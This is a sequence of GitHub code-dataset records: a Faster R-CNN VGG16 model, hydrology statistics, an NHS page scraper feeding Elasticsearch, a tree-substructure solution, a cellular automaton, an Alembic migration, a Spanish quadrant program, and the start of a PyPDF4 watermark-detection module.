normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = 
F.relu(self.conv2(x))\n if self.context:\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n x = self.conv3(x)\n return F.sigmoid(x),feat\n else:\n x = self.conv3(x)\n return F.sigmoid(x)\n\nclass netD2(nn.Module):\n def __init__(self,context=False):\n super(netD2, self).__init__()\n self.conv1 = conv3x3(512, 512, stride=2)\n self.bn1 = nn.BatchNorm2d(512)\n self.conv2 = conv3x3(512, 128, stride=2)\n self.bn2 = nn.BatchNorm2d(128)\n self.conv3 = conv3x3(128, 128, stride=2)\n self.bn3 = nn.BatchNorm2d(128)\n self.fc = nn.Linear(128,2)\n self.context = context\n self.leaky_relu = nn.LeakyReLU(negative_slope=0.2, inplace=True)\n def forward(self, x):\n x = F.dropout(F.relu(self.bn1(self.conv1(x))),training=self.training)\n x = F.dropout(F.relu(self.bn2(self.conv2(x))),training=self.training)\n x = F.dropout(F.relu(self.bn3(self.conv3(x))),training=self.training)\n x = F.avg_pool2d(x,(x.size(2),x.size(3)))\n x = x.view(-1,128)\n if self.context:\n feat = x\n x = self.fc(x)\n if self.context:\n return x,feat\n else:\n return x\n\n\nclass netD3(nn.Module):\n def __init__(self,context=False):\n super(netD3, self).__init__()\n self.conv1 = conv3x3(512, 512, stride=2)\n self.bn1 = nn.BatchNorm2d(512)\n self.conv2 = conv3x3(512, 128, stride=2)\n self.bn2 = nn.BatchNorm2d(128)\n self.conv3 = conv3x3(128, 128, stride=2)\n self.bn3 = nn.BatchNorm2d(128)\n self.fc = nn.Linear(128,2)\n self.context = context\n self.leaky_relu = nn.LeakyReLU(negative_slope=0.2, inplace=True)\n def forward(self, x):\n x = F.dropout(F.relu(self.bn1(self.conv1(x))),training=self.training)\n x = F.dropout(F.relu(self.bn2(self.conv2(x))),training=self.training)\n x = F.dropout(F.relu(self.bn3(self.conv3(x))),training=self.training)\n x = F.avg_pool2d(x,(x.size(2),x.size(3)))\n x = x.view(-1,128)\n if self.context:\n feat = x\n x = self.fc(x)\n if self.context:\n return x,feat\n else:\n return x\n\nclass netD_dc(nn.Module):\n def __init__(self):\n super(netD_dc, self).__init__()\n self.fc1 = nn.Linear(2048,100)\n self.bn1 = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100,100)\n self.bn2 = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100,2)\n def forward(self, x):\n x = F.dropout(F.relu(self.bn1(self.fc1(x))),training=self.training)\n x = F.dropout(F.relu(self.bn2(self.fc2(x))),training=self.training)\n x = self.fc3(x)\n return x\n\nclass vgg16(_fasterRCNN):\n def __init__(self, classes, pretrained=False, class_agnostic=False,gc1=False, gc2=False, gc3=False):\n self.model_path = cfg.VGG_PATH\n self.dout_base_model = 512\n self.pretrained = pretrained\n self.class_agnostic = class_agnostic\n self.gc1 = gc1\n self.gc2 = gc2\n self.gc3 = gc3\n\n _fasterRCNN.__init__(self, classes, class_agnostic,self.gc1,self.gc2, self.gc3)\n\n def _init_modules(self):\n vgg = models.vgg16()\n if self.pretrained:\n print(\"Loading pretrained weights from %s\" %(self.model_path))\n state_dict = torch.load(self.model_path)\n vgg.load_state_dict({k:v for k,v in state_dict.items() if k in vgg.state_dict()})\n\n vgg.classifier = nn.Sequential(*list(vgg.classifier._modules.values())[:-1])\n\n # not using the last maxpool layer\n #print(vgg.features)\n self.RCNN_base1 = nn.Sequential(*list(vgg.features._modules.values())[:14])\n self.RCNN_base2 = nn.Sequential(*list(vgg.features._modules.values())[14:21])\n self.RCNN_base3 = nn.Sequential(*list(vgg.features._modules.values())[21:-1])\n #print(self.RCNN_base1)\n #print(self.RCNN_base2)\n self.netD1 = netD1()\n self.netD_forward1 = netD_forward1()\n self.netD2 = netD2()\n self.netD_forward2 = netD_forward2()\n 
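_init_modules() splits torchvision's VGG-16 feature stack into three stages by slicing its module list and freezes the earliest convolutions. The same idiom in isolation, with the layer indices copied from the class and torchvision assumed installed:

import torch.nn as nn
import torchvision.models as models

vgg = models.vgg16()  # randomly initialized; this only demonstrates the slicing
features = list(vgg.features._modules.values())
base1 = nn.Sequential(*features[:14])
base2 = nn.Sequential(*features[14:21])
base3 = nn.Sequential(*features[21:-1])   # drop the final max-pool
# Freeze the first convolutions, as the detector does for layers 0-9:
for layer in range(10):
    for p in base1[layer].parameters():
        p.requires_grad = False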
self.netD3 = netD3()\n self.netD_forward3 = netD_forward3()\n feat_d = 4096\n feat_d += 128\n feat_d += 128\n feat_d += 128\n\n # Fix the layers before conv3:\n self.netD_inst = netD_inst(fc_size = feat_d)\n\n for layer in range(10):\n for p in self.RCNN_base1[layer].parameters(): p.requires_grad = False\n\n # self.RCNN_base = _RCNN_base(vgg.features, self.classes, self.dout_base_model)\n\n self.RCNN_top = vgg.classifier\n\n self.RCNN_cls_score = nn.Linear(feat_d, self.n_classes)\n if self.class_agnostic:\n self.RCNN_bbox_pred = nn.Linear(feat_d, 4)\n else:\n self.RCNN_bbox_pred = nn.Linear(feat_d, 4 * self.n_classes)\n\n\n def _head_to_tail(self, pool5):\n \n pool5_flat = pool5.view(pool5.size(0), -1)\n fc7 = self.RCNN_top(pool5_flat)\n\n return fc7\n\n","repo_name":"harsh-99/SCL","sub_path":"lib/model/faster_rcnn/vgg16_SCL.py","file_name":"vgg16_SCL.py","file_ext":"py","file_size_in_byte":11159,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"} +{"seq_id":"30418979282","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 8 22:42:00 2022\n\n@author: rq.aita\n\"\"\"\n\nimport pandas as pd\nfrom datetime import date, timedelta\n\ndef read_data(file):\n # Read the data\n df = pd.read_excel(file, header=None)\n i = df.iloc[0, 0].date()\n f = df.iloc[-1, 0].date()\n \n # Print the start and end of the series\n print(\"Início da série:\", i)\n print(\"Fim da série:\", f)\n return df, i, f\n\n\ndef daily_scale(df, i, f):\n # Build the day, month and year lists\n dia = []\n mes = []\n ano = []\n \n while i <= f: # while there are days left in the series\n dia.append(i.day)\n mes.append(i.month)\n ano.append(i.year)\n i += timedelta(days=1)\n \n return pd.DataFrame({'dia':dia, 'mes':mes, 'ano':ano, 'data':df.loc[:, 1]})\n\n\ndef month_scale(df, i, f):\n # Build the month and year lists\n mes = []\n ano = []\n media = []\n\n for a in range(i.year, f.year + 1): # for every year\n df_year = df[df['ano'] == a]\n \n if i.year == f.year:\n i_mes = i.month\n f_mes = f.month\n elif a == i.year:\n i_mes = i.month\n f_mes = 12\n elif a == f.year:\n i_mes = 1\n f_mes = f.month \n else:\n i_mes = 1\n f_mes = 12\n\n for m in range(i_mes, f_mes + 1): # for every month of the year\n df_month = df_year[df_year['mes'] == m]\n mes.append(m)\n media.append(df_month[\"data\"].mean())\n ano.append(a)\n\n return pd.DataFrame({'mes':mes, 'ano':ano, 'data':media})\n\n\ndef year_scale(df, i, f):\n # Build the year list\n ano = []\n media = []\n\n for a in range(i.year, f.year + 1): # for every year\n df_year = df[df['ano'] == a]\n media.append(df_year[\"data\"].mean())\n ano.append(a)\n\n return pd.DataFrame({'ano':ano, 'data':media})\n\n\ndef multiple_scales(df, i, f):\n df_dia = daily_scale(df, i, f)\n df_mes = month_scale(df_dia, i, f)\n df_ano = year_scale(df_mes, i, f)\n \n return df_dia, df_mes, df_ano\n\n\ndef descriptive_stats(data):\n \n N = data.count() # size of the series\n mean = round(data.mean(), 2)\n std = round(data.std(), 2)\n var = round(data.var(), 2)\n q1 = round(data.quantile(q=0.25), 2)\n q2 = round(data.quantile(q=0.5), 2)\n q3 = round(data.quantile(q=0.75), 2)\n AIQ = round(q3 - q1, 2)\n xmax = round(data.max(), 2)\n xmin = round(data.min(), 2)\n A = round(xmax - xmin, 2)\n cvar = round(100 * std / mean, 0)\n skew = round(data.skew(), 3)\n kurt = round(data.kurtosis(), 3)\n\n desc_stats = {}\n desc_stats['Tamanho'] = [N , '-']\n desc_stats['Média'] = [mean, 'm3/s']\n desc_stats['Desvio padrão'] = [std , 'm3/s']\n 
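# Editor's note -- the hand-rolled month_scale/year_scale loops above compute calendar
# means; with a DatetimeIndex, pandas' resample performs the same aggregation in one
# call. Synthetic series below, shown for comparison only.
import numpy as np
import pandas as pd

idx = pd.date_range("2000-01-01", "2001-12-31", freq="D")
serie = pd.Series(np.random.rand(len(idx)), index=idx, name="data")
monthly = serie.resample("M").mean()  # one mean per calendar month
yearly = serie.resample("A").mean()   # one mean per calendar year
print(monthly.head(3))
print(yearly)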
desc_stats['Variância'] = [var , 'm6/s2']\n desc_stats['Primeiro quartil'] = [q1 , 'm3/s']\n desc_stats['Mediana'] = [q2 , 'm3/s']\n desc_stats['Terceiro quartil'] = [q3 , 'm3/s']\n desc_stats['Amplitude inter-quartil'] = [AIQ , 'm3/s']\n desc_stats['Máximo'] = [xmax, 'm3/s']\n desc_stats['Mínimo'] = [xmin, 'm3/s']\n desc_stats['Amplitude'] = [A , 'm3/s']\n desc_stats['Coeficiente de variação'] = [cvar, '%']\n desc_stats['Assimetria'] = [skew, '-']\n desc_stats['Curtose'] = [kurt, '-']\n\n desc_stats = pd.DataFrame(desc_stats).transpose()\n desc_stats.columns = ['Valor', 'Unidade']\n \n print(desc_stats)\n return desc_stats\n\n\ndef activ_2_stats(file):\n # Read the data\n df, i, f = read_data(file)\n \n # Multiple time scales\n df_dia, df_mes, df_ano = multiple_scales(df, i, f)\n \n # Yearly\n data = df_ano[\"data\"]\n print(\"Anual\")\n desc_stats_ano = descriptive_stats(data)\n print(\"\\n\")\n \n # Daily\n data = df_dia[\"data\"]\n print(\"Diário\")\n desc_stats_dia = descriptive_stats(data)\n print(\"\\n\")\n \n # Monthly\n desc_stats_mes = []\n for m in range(1, 13):\n data = df_mes[df_mes[\"mes\"] == m][\"data\"]\n print(\"Mês:\", m)\n desc_stats_mes.append(descriptive_stats(data))\n print(\"\\n\")\n \n return desc_stats_ano, desc_stats_dia, desc_stats_mes, df, i, f\n\n\n#%%\n\nfiles = [\n \"flow_sjp.xlsx\", \"prec_sjp.xlsx\",\n \"flow_xgu.xlsx\", \"prec_xgu.xlsx\",\n]\n\ndesc_serie = [\n \"Vazão SJP\", \"Precipitação SJP\",\n \"Vazão XGU\", \"Precipitação XGU\",\n]\n\nfor file, title in zip(files, desc_serie):\n print(title)\n _, _, _, _, _, _ = activ_2_stats(file)","repo_name":"rqaita/stats-hydro","sub_path":"activ_2/.ipynb_checkpoints/activ_2-checkpoint.py","file_name":"activ_2-checkpoint.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19466550264","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom urlparse import urlparse\nimport json\nfrom elasticsearch import Elasticsearch\nimport sys\n\nclass PageInfoModel:\n\tdef __init__(self,title,url,content):\n\t\tself.title = title\n\t\tself.url = url\n\t\tself.content = content\n\n\tdef to_json(self):\n\t\treturn json.dumps(self.__dict__)\n\ndef get_pages_info_models(startUrl,depth=2,printLog=True):\n\tmainUrl = urlparse(startUrl)\n\traw = requests.get(startUrl).content\n\tsoup = BeautifulSoup(raw,'html.parser')\n\tyield get_model(soup,startUrl)\n\treviewedUrls = set([startUrl])\n\tif not depth:\n\t\treturn  # end the generator cleanly (PEP 479 deprecates raising StopIteration here)\n\n\tnextUrls = [(link,1) for link in get_condition_links(soup)]\n\n\twhile len(nextUrls):\n\t\t(link, currentDepth) = nextUrls.pop(0)\n\t\turl = '{}://{}{}'.format(mainUrl.scheme,mainUrl.netloc,link)\n\t\tif url in reviewedUrls:\n\t\t\tcontinue\n\t\tif printLog:\n\t\t\tprint('Analyzing {}'.format(url))\n\t\traw = requests.get(url).content\n\t\tsoup = BeautifulSoup(raw,'html.parser')\n\t\tyield get_model(soup,url)\n\t\treviewedUrls.add(url)\n\t\tif currentDepth < depth:\n\t\t\tnextUrls.extend([(link,currentDepth+1) for link in get_content_links(soup)])\n\n\ndef get_content_links(soup):\n\tcontentDiv = soup.select_one(\"div .content-wrap\")\n\treturn [link.get('href') for link in contentDiv.find_all('a') \n\t\t\tif link.get('href') is not None and link.get('href').lower().startswith('/conditions')]\n\ndef get_condition_links(soup):\n\treturn [link.get('href') for link in soup.find_all('a') if link.get('href').lower().startswith('/conditions')]\n\ndef get_page_content(soup):\n\t#remove 
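# Editor's note -- pandas' built-in describe() already covers most of the table
# assembled by descriptive_stats above (count, mean, std, min, quartiles, max);
# only the derived rows such as the IQR, range, CV, skewness and kurtosis need
# extra lines. Synthetic flow values, for illustration.
import pandas as pd

data = pd.Series([10.0, 12.5, 9.8, 14.2, 11.1, 13.3])
print(data.describe())
iqr = data.quantile(0.75) - data.quantile(0.25)
cv = 100 * data.std() / data.mean()
print("IQR=%.2f  CV=%.0f%%  skew=%.3f  kurt=%.3f"
      % (iqr, cv, data.skew(), data.kurtosis()))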
javascript and styles\n\tfor script in soup(['script','style']):\n\t\tscript.decompose()\n\ttext = soup.get_text()\n\n\t#remove unnecessary spaces\n\ttext = re.sub('\\s+',' ',text)\n\n\treturn text.strip()\n\ndef get_model(soup,url):\n\treturn PageInfoModel(soup.title.string,url,get_page_content(soup))\n\ndef run(args):\n\telasticsearchServer = args[0] if len(args) else 'localhost:9200'\n\tindexName = 'nhs_conditions'\n\tdocType = 'condition'\n\n\tes = Elasticsearch(elasticsearchServer)\n\tes.indices.delete(index=indexName, ignore=[400,404])\n\n\tf = open('nhsPageContent','w')\n\tf.write('[')\n\tfor model in get_pages_info_models('http://www.nhs.uk/Conditions/Pages/hub.aspx'):\n\t\tdoc = model.to_json()  # renamed from 'json' to avoid shadowing the json module\n\t\tes.index(index=indexName, doc_type=docType, body=doc)\n\t\tf.write(doc + \",\\n\")\n\t\n\tf.write(']')\n\tf.close()\n\tes.indices.refresh(index=indexName)\n\nif __name__ == '__main__':\n\trun(sys.argv[1:])\n\t","repo_name":"snava10/nhs-crawler","sub_path":"nhsWebScraper.py","file_name":"nhsWebScraper.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"26910092173","text":"# Substructure of a tree\n\n# Given two binary trees A and B, determine whether B is a substructure of A.\n# (Note: by convention, an empty tree is not a substructure of any tree.)\n\n######################################################################\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\ndef stringToTreeNode(input):\n input = input.strip()\n input = input[1:-1]\n if not input:\n return None\n\n inputValues = [s.strip() for s in input.split(',')]\n root = TreeNode(int(inputValues[0]))\n nodeQueue = [root]\n front = 0\n index = 1\n while index < len(inputValues):\n node = nodeQueue[front]\n front = front + 1\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n leftNumber = int(item)\n node.left = TreeNode(leftNumber)\n nodeQueue.append(node.left)\n\n if index >= len(inputValues):\n break\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n rightNumber = int(item)\n node.right = TreeNode(rightNumber)\n nodeQueue.append(node.right)\n return root\n######################################################################\n# -*- coding:utf-8 -*-\nclass Solution:\n def HasSubtree(self, pRoot1, pRoot2):\n if not pRoot1 or not pRoot2:\n return False\n return self.classifytree(pRoot1,pRoot2) or self.HasSubtree(pRoot1.left,pRoot2) or self.HasSubtree(pRoot1.right,pRoot2)\n def classifytree(self, tree1,tree2):\n if not tree2:\n return True\n if not tree1 or tree1.val != tree2.val:\n return False\n return self.classifytree(tree1.left,tree2.left) and self.classifytree(tree1.right,tree2.right)\n\n######################################################################\ntree = '[3,9,20,null,null,15,7]'\nBtree = stringToTreeNode(tree)","repo_name":"EugenenZhou/leetcode","sub_path":"nowcoder/jzoffer/HasSubtree.py","file_name":"HasSubtree.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"28852261476","text":"import copy\nfrom cellular_automata_rules import next_step_cell\nfrom cell import Cell\n\ndef init_board(density, width, height, rng):\n \"\"\"\n Initialises a board\n :param density: float between 0 and 1, representing how many cells are alive at the start at most\n :param width: width of the board, in cells\n :param height: height of the board, in cells\n :param rng: a random.Random object responsible for providing the random numbers\n :return: 2D array of cells, randomly put on the field\n \"\"\"\n 
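# Editor's note -- a minimal standalone use of the substructure check above, with the
# same recursion inlined so the snippet runs on its own; node values are arbitrary.
class Node:
    def __init__(self, x):
        self.val, self.left, self.right = x, None, None

def covers(t1, t2):
    # True if t2 appears as a substructure rooted somewhere inside t1
    def same_top(a, b):
        if not b:
            return True
        if not a or a.val != b.val:
            return False
        return same_top(a.left, b.left) and same_top(a.right, b.right)
    if not t1 or not t2:
        return False
    return same_top(t1, t2) or covers(t1.left, t2) or covers(t1.right, t2)

a = Node(8); a.left = Node(8); a.right = Node(7)
a.left.left = Node(9); a.left.right = Node(2)
b = Node(8); b.left = Node(9); b.right = Node(2)
print(covers(a, b))  # True: b matches the subtree rooted at a.left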
print(rng.getstate())\n board = [[Cell.DEAD for i in range(width)] for j in range(height)]\n for i in range(int(width * height * density)):\n x, y = rng.randint(0, width - 1), rng.randint(0, height - 1)\n board[y][x] = Cell.ALIVE\n return board\n\ndef next(board):\n \"\"\"\n Runs one step of the cellular automata\n :param board: 2D array of cells, representing the initial state of the board\n :return: 2D array of cells, representing the next state\n \"\"\"\n next_board = copy.deepcopy(board) # All cells evolve at the same time so we store their next state before updating them all\n for i in range(len(board)):\n for j in range(len(board[0])):\n next_board[i][j] = next_step_cell([[board[(i+k) % len(board)][(j+l) % len(board[0])] for k in range(-1, 2)] for l in range(-1, 2)]) # Gets the neighborhood of the cell, including itself\n for i in range(len(board)):\n for j in range(len(board[0])):\n board[i][j] = next_board[i][j] # Updates the initial board\n return board\n","repo_name":"MOLLARDAmbre/game-of-life-battle","sub_path":"cellular_automata.py","file_name":"cellular_automata.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37935920663","text":"\"\"\"empty message\r\n\r\nRevision ID: d11eb19bd206\r\nRevises: 15aa4eba5862\r\nCreate Date: 2017-11-01 14:48:23.518755\r\n\r\n\"\"\"\r\nfrom alembic import op\r\nimport sqlalchemy as sa\r\n\r\n\r\n# revision identifiers, used by Alembic.\r\nrevision = 'd11eb19bd206'\r\ndown_revision = '15aa4eba5862'\r\nbranch_labels = None\r\ndepends_on = None\r\n\r\n\r\ndef upgrade():\r\n # ### commands auto generated by Alembic - please adjust! ###\r\n op.create_table('email_messages',\r\n sa.Column('email_message_id', sa.Integer(), nullable=False),\r\n sa.Column('recipient', sa.String(length=100), nullable=False),\r\n sa.Column('subject', sa.String(length=255), nullable=True),\r\n sa.Column('text', sa.Text(), nullable=True),\r\n sa.Column('html', sa.Text(), nullable=True),\r\n sa.Column('is_sent', sa.Boolean(), nullable=True),\r\n sa.Column('last_error', sa.Text(), nullable=True),\r\n sa.Column('created_on', sa.DateTime(), nullable=True),\r\n sa.PrimaryKeyConstraint('email_message_id')\r\n )\r\n # ### end Alembic commands ###\r\n\r\n\r\ndef downgrade():\r\n # ### commands auto generated by Alembic - please adjust! 
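# Editor's note -- the modular indexing in next() above wraps the board into a torus,
# so edge cells still see a full 3x3 neighbourhood. Tiny standalone demo:
board = [[0, 1, 2],
         [3, 4, 5],
         [6, 7, 8]]
n, m = len(board), len(board[0])
i, j = 0, 0  # top-left corner cell
neigh = [[board[(i + k) % n][(j + l) % m] for l in range(-1, 2)] for k in range(-1, 2)]
print(neigh)  # [[8, 6, 7], [2, 0, 1], [5, 3, 4]] -- wraps around to the opposite edges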
###\r\n op.drop_table('email_messages')\r\n # ### end Alembic commands ###\r\n","repo_name":"merab-sulimov/Flask-sample","sub_path":"migrations/versions/d11eb19bd206_.py","file_name":"d11eb19bd206_.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8706862243","text":"# Program to determine the quadrant of a coordinate.\n\n# Character set used by evaluar_variable_uno() below to validate numeric input\n\nvariable_numeros = '-123456789.'\n\n# This function verifies that the user did not mistype a numeric (float) value\n# when entering the coordinates whose quadrant is to be determined\ndef evaluar_variable_uno(param,variable):\n cont = 0\n if(param.count('.') > 1 or param.count('-') > 1 or param == '0'):\n cont += 1\n for i in param:\n # if this condition holds at least once, the counter is incremented;\n # a single increment is enough to flag the user's input as invalid\n if(i not in variable):\n cont += 1\n return int(cont)\n\ndef evaluar_variable_dos(cadena):\n while(evaluar_variable_uno(cadena,variable_numeros)>0):\n cadena = input('Favor de intentarlo de nuevo: ')\n return float(cadena)\n\n# These counters are used throughout the program: when the user is asked whether\n# they liked it, they tally the positive and negative ratings one by one,\n# depending on whether the user answers \"S\" (yes) or \"N\" (no)\ncont = 0; cont_seg = 0\n\n# This function validates the user's choice between the 2D and 3D planes: if the\n# answer is anything other than option a) or b), the user is prompted to type it again.\ndef leervar_curt(param,letra_uno,letra_dos,letra_tres,letra_cuatro):\n while(param != letra_uno and param != letra_dos and param != letra_tres and param != letra_cuatro):\n param = input(f'Favor de ingresar de nuevo el dato por favor ({letra_uno}/{letra_tres}): ')\n return param\n \n# Function dedicated to reading 2D coordinates when the user picks option a)\ndef CalC_Cuad():\n x = input('Favor de digitar la coordenada en \"X\": ')\n # Validate the value with evaluar_variable_dos()\n x = evaluar_variable_dos(x) \n y = input('Favor de digitar la coordenada en \"Y\": ')\n y = evaluar_variable_dos(y)\n \n # Depending on the signs of the coordinates, report which quadrant the point belongs to\n if(x > 0 and y > 0):\n print('Su punto se encuentra en el cuadrante I')\n elif(x < 0 and y > 0):\n print('Su punto se encuentra en el cuadrante II')\n elif(x < 0 and y < 0):\n print('Su punto se encuentra en el cuadrante III')\n elif(x > 0 and y < 0):\n print('Su punto se encuentra en el cuadrante IV')\n\n# Function dedicated to reading 3D coordinates when the user picks option b)\ndef CalC_Cuad_seg():\n x = input('Favor de digitar la coordenada en \"X\": ')\n # Apply the same validation logic as in CalC_Cuad()\n x = evaluar_variable_dos(x)\n \n y = input('Favor de digitar la coordenada en \"Y\": ')\n y = evaluar_variable_dos(y)\n \n z = input('Favor de digitar la coordenada en \"Z\": ')\n # this time adding the third coordinate, z\n z = 
evaluar_variable_dos(z)\n \n # This time the sign test determines the octant instead\n if(x > 0 and y > 0 and z > 0):\n print('Su punto se encuentra en el octante I')\n elif(x > 0 and y < 0 and z > 0):\n print('Su punto se encuentra en el octante IV')\n elif(x < 0 and y > 0 and z > 0):\n print('Su punto se encuentra en el octante II')\n elif(x < 0 and y < 0 and z > 0):\n print('Su punto se encuentra en el octante III')\n elif(x > 0 and y > 0 and z < 0):\n print('Su punto se encuentra en el octante V')\n elif(x > 0 and y < 0 and z < 0):\n print('Su punto se encuentra en el octante VIII')\n elif(x < 0 and y > 0 and z < 0):\n print('Su punto se encuentra en el octante VI')\n elif(x < 0 and y < 0 and z < 0):\n print('Su punto se encuentra en el octante VII')\n\n \nanswer = 's'\nwhile(answer == 's' or answer == 'S'):\n print(\"\"\"En que plano desea trabajar? \na) Plano 2D,\\tb) Plano 3D\"\"\")\n # ask which plane (a or b) the user wants to work in\n answer = input('Digite su respuesta (a/b): ')\n # make sure the answer is a valid \"a\" or \"b\"\n answer = leervar_curt(answer,'A','a','B','b')\n # call the function that matches the chosen option\n if(answer == 'a' or answer == 'A'):\n CalC_Cuad()\n elif(answer == 'b' or answer == 'B'):\n CalC_Cuad_seg()\n # ask the user to rate their experience\n answer = input('Le gusto nuestro servicio (S/N)? ')\n answer = leervar_curt(answer,'S','s','N','n')\n \n # After making sure the answer is a valid \"s\" or \"n\" via leervar_curt(),\n # increment one of the rating counters described above, depending on the response\n if(answer == 's' or answer == 'S'):\n cont += 1\n elif(answer == 'n' or answer == 'N'):\n cont_seg += 1\n answer = input('Desea volver a intentarlo (S/N)? ')\n answer = leervar_curt(answer,'S','s','N','n')\nif(cont > cont_seg):\n conclusión = 'A la gente le gusto mas el programa de lo que no le gusto'\nelif(cont_seg > cont):\n conclusión = 'A la gente le desagrado mas el programa de lo que le gusto'\nelse:\n conclusión = 'A la gente le gusto el programa tanto como no le gusto'\nprint(f'''\\n Has llegado al final del programa\nValoraciones buenas: {cont}\nValoraciones malas: {cont_seg}\nConclusión Final: {conclusión}\n''')\n\n#################################################################################################################################\n\n# Program to measure the length of a word\n\nanswer = 's'\nwhile(answer == 'S' or answer == 's'):\n palabra = input('Digite su correspondiente palabra: ')\n cantidad = len(palabra)\n \n if(cantidad >= 4 and cantidad <= 8):\n print(f'Su palabra \"{palabra}\" es ¡CORRECTO!')\n elif(cantidad < 4):\n print(f'Hacen falta letras. Solo tiene \"{cantidad}\" letras.')\n elif(cantidad > 8):\n print(f'Sobran letras. Tiene \"{cantidad}\" letras.')\n \n answer = input('Le gustaria volver a intentarlo (S/N)? 
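# Editor's note -- the eight sign tests above collapse into a lookup keyed by the sign
# pattern of (x, y, z); octant numbering follows the Roman-numeral convention used in
# the program. Points lying on an axis plane (any coordinate equal to 0) are left
# unclassified, exactly as in the original conditionals.
OCTANTS = {(1, 1, 1): 'I',   (-1, 1, 1): 'II',  (-1, -1, 1): 'III',  (1, -1, 1): 'IV',
           (1, 1, -1): 'V',  (-1, 1, -1): 'VI', (-1, -1, -1): 'VII', (1, -1, -1): 'VIII'}

def octant(x, y, z):
    key = tuple(1 if c > 0 else -1 for c in (x, y, z))
    return OCTANTS[key] if all((x, y, z)) else None

print(octant(2.0, -3.5, 1.0))  # IV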
')\n answer = leervar_curt(answer,'S','s','N','n')\n\nprint('Usted ya ha llegado al final del programa, gracias por su visita.')","repo_name":"JohnCard/Proyectos-del-modulo-2","sub_path":"Juan Carlos_Sanchez Martinez_proyectoM2.py","file_name":"Juan Carlos_Sanchez Martinez_proyectoM2.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35954039079","text":"from PyPDF4 import PdfFileReader, PdfFileWriter\nfrom PyPDF4.pdf import ContentStream, PageObject\nfrom PyPDF4.generic import TextStringObject, NameObject, IndirectObject\nfrom PyPDF4.utils import b_\nfrom PyPDF4.utils import PyPdfError\n\n\n# PyMuPDF\nimport fitz\n\nfrom collections import Counter\nfrom typing import Dict, List, Optional, Tuple\n\n\ndef fix_recursive_IndirectObject(\n obj: object) -> object:\n \"\"\"\n Recursively resolve all IndirectObject references\n \"\"\"\n if not isinstance(obj, IndirectObject):\n return obj\n\n obj = obj.getObject()\n\n for key, val in obj.items():\n obj[key] = fix_recursive_IndirectObject(val)\n return obj\n\ndef fig_covers_entiry_page(\n page: PageObject,\n source: PdfFileReader,\n operand: str,\n p_covered: float = 0.95) -> bool:\n \"\"\"\n Check whether a figure covers more than p_covered (default 0.95) of a page;\n if so, the image is considered a watermark\n\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n operand: PDF Stream Operand name addressing the figure\n p_covered: percentage of accepted coverage of the figure over the page\n \"\"\"\n\n page_height = int(page.mediaBox.getHeight())\n page_width = int(page.mediaBox.getWidth())\n\n wm_operation_blocks, content = find_watermark_stack_block(page, source, [operand], aggressive=1)\n fig_width = 0\n fig_height = 0\n for p in wm_operation_blocks:\n # Check the 'cm' operator found in the watermark stack block.\n # This is risky, since we assume the stream PDF operations\n # are well organized, with only one 'cm' operand in the watermark rendering stack block.\n # fig_width and fig_height are the scaling factors (in x and y) present in the\n # current transformation matrix (CTM)\n if len(content.operations[p][0]) == 6:\n fig_width = content.operations[p][0][0]\n fig_height = content.operations[p][0][3]\n break\n\n # If the smaller of the two coverage ratios exceeds p_covered,\n # the image is a watermark\n if min(fig_height / page_height, fig_width / page_width) > p_covered:\n return True\n return False\n\ndef get_page_resources_watermarks(\n page: PageObject,\n source: PdfFileReader) -> List:\n \"\"\"\n Return all operand keys from a PDF page Resource that might be\n from a watermark, i.e. 
named resources /Fm0 and /X0\n \"\"\"\n\n if page.get('/Resources') is None:\n return []\n if page['/Resources'].get('/XObject') is None:\n return []\n\n xobject = page['/Resources']['/XObject'].getObject()\n\n wm_keys = []\n for key in xobject.keys():\n #Usally the softwares like Adobe insert the watermark as a\n # named resource name as Fm, na dwith a information claiming\n # that this resource is a watermark\n if '/fm' in key.lower():\n info = xobject[key].get('/PieceInfo')\n if info is None:\n continue\n info = fix_recursive_IndirectObject(info)\n # If watermark found, include it to watermark_keys\n if ('watermark' in str(info).lower()) or \\\n 'background' in str(info).lower():\n wm_keys.append(key)\n\n # Some Academic mistakely add the watermark to the PDF\n # As a form, without adding the informatio of watermark\n elif '/x' in key.lower():\n info = xobject[key].get('/Subtype')\n info = fix_recursive_IndirectObject(info)\n if 'form' in str(info).lower():\n wm_keys.append(key)\n if fig_covers_entiry_page(page, source, key):\n wm_keys.append(key)\n\n return wm_keys\n\ndef get_GS_watermark_from_pdf(\n source: PdfFileReader) -> List:\n \"\"\"\n This function tends to admit a watermark more aggresived by\n looking at the graphic /GS from the ExtGState\n\n So, it scans all pages from PDF File Source\n checking the number of GS operation frequency\n in more than one page. Each GS that\n occurs in more than one page, we assume that it is a\n watermark. It works, but can cause some false-positive.\n \"\"\"\n # Initialize extGstates\n extGstates = []\n\n # Check Gs along the pdf document\n for page in 